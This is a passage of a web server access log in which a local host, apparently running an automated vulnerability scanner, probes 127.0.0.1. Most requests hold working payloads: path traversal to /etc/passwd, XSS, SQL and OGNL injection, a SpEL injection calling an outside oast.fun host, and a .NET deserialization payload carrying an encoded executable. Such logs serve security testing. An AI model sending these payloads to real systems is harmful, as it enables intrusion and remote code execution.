"http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apache.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.225","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /favicon.ico HTTP/1.1","status":"200","body_bytes_sents":"4286","req_time":"0.057","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /karma.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.071","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.072","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ssl/localhost.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.064","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.070","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin.php?page=my-sticky-elements-leads&search-contact=xxxx%22%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29+x HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.070","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?pp=env HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.224","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.067","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-config.php.save HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"1.230","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /lostpassword.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.068","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/doenterpagevariables.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.073","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /images/..%2finfo.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.076","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1/info.html", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xmldata?item=CpqKey HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.072","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"{\x0D\x0A \x22predicates\x22: [\x0D\x0A {\x0D\x0A \x22name\x22: \x22Path\x22,\x0D\x0A \x22args\x22: {\x0D\x0A \x22_genkey_0\x22: \x22/297MTtOcjwZljtvbbbwg1qHf85k/**\x22\x0D\x0A }\x0D\x0A }\x0D\x0A ],\x0D\x0A \x22filters\x22: [\x0D\x0A {\x0D\x0A \x22name\x22: \x22RewritePath\x22,\x0D\x0A \x22args\x22: {\x0D\x0A \x22_genkey_0\x22: \x22#{T(java.net.InetAddress).getByName(\x5C\x22c9v8h88smpv8c1ig07h08xecox6xb3eb5.oast.fun\x5C\x22)}\x22,\x0D\x0A \x22_genkey_1\x22: \x22/${path}\x22\x0D\x0A }\x0D\x0A }\x0D\x0A ],\x0D\x0A \x22uri\x22: \x22http://127.0.0.1\x22,\x0D\x0A \x22order\x22: 0\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /actuator/gateway/routes/297MTtOcjwZljtvbbbwg1qHf85k HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.075","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /druid/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.076","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/marmoset-viewer/mviewer.php?id=http:// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.073","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?r=students/guardians/create&id=1%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.090","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/system/deviceinfo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.069","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/phpmyadmin/scripts/setup.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.072","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Login.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.070","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /wlmeng/../../../../../../../../../../../etc/passwd%00index.htm HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /kustomization.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.080","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?return_url=javascript:alert(document.domain) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.091","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?IO.popen(%27cat%20%2Fetc%2Fpasswd%27).read%0A%23 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.083","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iPages/i_login.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.062","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ssl/127.0.0.1.key HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.083","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webpack.config.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"{\x0D\x0A \x22predicate\x22: \x22Paths: [/297MTtOcjwZljtvbbbwg1qHf85k], match trailing slash: true\x22,\x0D\x0A \x22route_id\x22: \x22297MTtOcjwZljtvbbbwg1qHf85k\x22,\x0D\x0A \x22filters\x22: [\x0D\x0A \x22[[RewritePath #{T(java.net.InetAddress).getByName(\x5C\x22c9v8h88smpv8c1ig07h0hh5ppr1fnqk7x.oast.fun\x5C\x22)} = /${path}], order = 1]\x22\x0D\x0A ],\x0D\x0A \x22uri\x22: \x22http://127.0.0.1\x22,\x0D\x0A \x22order\x22: 0\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /actuator/gateway/refresh HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.066","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:57 +0000","request_body":"stagingTaskData=%3cSOAP-ENV%3aEnvelope%20xmlns%3axsi%3d%22http%3a//www.w3.org/2001/XMLSchema-instance%22%20xmlns%3axsd%3d%22http%3a//www.w3.org/2001/XMLSchema%22%20xmlns%3aSOAP-ENC%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%20xmlns%3aSOAP-ENV%3d%22http%3a//schemas.xmlsoap.org/soap/envelope/%22%20xmlns%3aclr%3d%22http%3a//schemas.microsoft.com/soap/encoding/clr/1.0%22%20SOAP-ENV%3aencodingStyle%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%3e%0a%20%20%3cSOAP-ENV%3aBody%3e%0a%20%20%20%20%3ca1%3aWindowsIdentity%20id%3d%22ref-1%22%20xmlns%3aa1%3d%22http%3a//schemas.microsoft.com/clr/nsassem/System.Security.Principal/mscorlib%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3db77a5c561934e089%22%3e%0a%20%20%20%20%20%20%3cSystem.Security.ClaimsIdentity.actor%20id%3d%22ref-2%22%20xmlns%3d%22%22%20xsi%3atype%3d%22xsd%3astring%22%3eAAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAALoXL2MgZWNobyBUVnFRQUFNQUFBQUVBQUFBLy84QUFMZ0FBQUFBQUFBQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQTZBQUFBQTRmdWc0QXRBbk5JYmdCVE0waFZHaHBjeUJ3Y205bmNtRnRJR05oYm01dmRDQmlaU0J5ZFc0Z2FXNGdSRTlUSUcxdlpHVXVEUTBLSkFBQUFBQUFBQUNUT1BEVzExbWVoZGRabm9YWFdaNkZyRVdTaGROWm5vVlVSWkNGM2xtZWhiaEdsSVhjV1o2RnVFYWFoZFJabm9YWFdaK0ZIbG1laFZSUnc0WGZXWjZGZzNxdWhmOVpub1VRWDVpRjFsbWVoVkpwWTJqWFdaNkZBQUFBQUFBQUFBQUFBQUFBQUFBQUFGQkZBQUJNQVFRQU81UnRTZ0FBQUFBQUFBQUE0QUFQQVFzQkJnQUFzQUFBQUtBQUFBQUFBQUNiaFFBQUFCQUFBQURBQUFBQUFFQUFBQkFBQUFBUUFBQUVBQUFBQUFBQUFBUUFBQUFBQUFBQUFHQUJBQUFRQUFBQUFBQUFBZ0FBQUFBQUVBQUFFQUFBQUFBUUFBQVFBQUFBQUFBQUVBQUFBQUFBQUFBQUFBQUFiTWNBQUhnQUFBQUFVQUVBeUFjQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU9EQkFBQWNBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBREFBQURnQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBTG5SbGVIUUFBQUJtcVFBQUFCQUFBQUN3QUFBQUVBQUFBQUFBQUFBQUFBQUFBQUFBSUFBQVlDNXlaR0YwWVFBQTVnOEFBQURBQUFBQUVBQUFBTUFBQUFBQUFBQUFBQUFBQUFBQUFFQUFBRUF1WkdGMFlRQUFBRnh3QUFBQTBBQUFBRUFBQUFEUUFBQUFBQUFBQUFBQUFBQUFBQUJBQUFEQUxuSnpjbU1BQUFESUJ3QUFBRkFCQUFBUUFBQUFFQUVBQUFBQUFBQUFBQUFBQUFBQVFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE%2bPiVURU1QJVxock9YVy5iNjQGBwAAAANjbWQEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA%2bU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAA